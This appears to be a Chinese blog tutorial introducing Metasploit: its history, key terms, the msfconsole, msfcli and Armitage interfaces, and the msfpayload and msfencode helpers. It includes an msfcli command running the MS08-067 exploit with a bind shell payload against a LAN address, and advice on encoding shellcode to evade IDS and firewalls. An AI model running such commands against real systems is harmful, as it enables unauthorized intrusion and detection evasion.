一、MSF简介
MFS也称Metasploit,是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
2004年8月,在拉斯维加斯开了一次世界黑客交流会---黑帽简报(Black Hat Briefings). 在这个会议上,一款叫Metasploit 的攻击和渗透工具备受众黑客关注,出尽了风头。
二、名称解释
渗透测试攻击-exploit
渗透测试是指由攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。流行的攻击技术包括:缓冲区溢出、web应用程序漏洞攻击,以及利用配置错误等
攻击载荷-payload
我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一个反向连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只能在目标机器上执行有限命令的程序
shellcode
是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提供一个可
执行命令的shell。
module
MSF 的模块,由一系列代码组成。
listener
等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序。
三、metasploit基础
1、 MSF 提供多种用户界面:控制台模式(msfconsole),命令行模式(msfcli),图形模式(msfgui、armitage),(在老版本中还有web 界面模式,后来貌似由于安全因素被取消了?)其中console模式最常用,启动方式:
cd /opt/framework/msf3/
msfconsole
运行此命令后将进入msf 命令提示符:
msf>
2、获取命令的帮助信息:help
例子:
help connect
3、msfcli 和msfconsole 相比不提供交互方式,它直接从命令行输入所有参数并产生结果,
msfcli –h #获取帮助信息
msfcli <exploit_name> <option=value> [mode]
mode:H(help)帮助
S(summary)显示模块信息
O(options)显示模块的可用选项
A(advanced)显示高级选项
I(ids)显示IDS EVASION 选项
P(payload)显示此模块可用的payload
T(targets)显示可用targets
4
AC(action)显示可用actions
C(check)运行模块测试
E(execute)执行选定的模块
===============
例子:ms08_067_netapi 模块
msfcli windows/smb/ms08_067_netapi O #查看可用选项
msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.111 P #查看可用payload
msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.111 PAYLOAD=windows/shell/bind_tcp E
#执行(此处O、P 等参数也可以用小写)
4、Armitage :MSF 的一个图形接口
运行方式:
cd /opt/farmework/msf3/
armitage
5、MSF 其他组件:
MSFpayload 工具:
用于生成shellcode,可生成C,Ruby,JaveScript,VB 格式的shellcode。
帮助信息:
msfpayload –h
MSFencode 工具:
编码压缩shellcode,过IDS ,防火墙。
msfencode -h
msfencode –l 查看可用的编码器(encoders),效果最佳的是x86/shikata_ga_nai
有问题请加博主微信进行沟通!
全部评论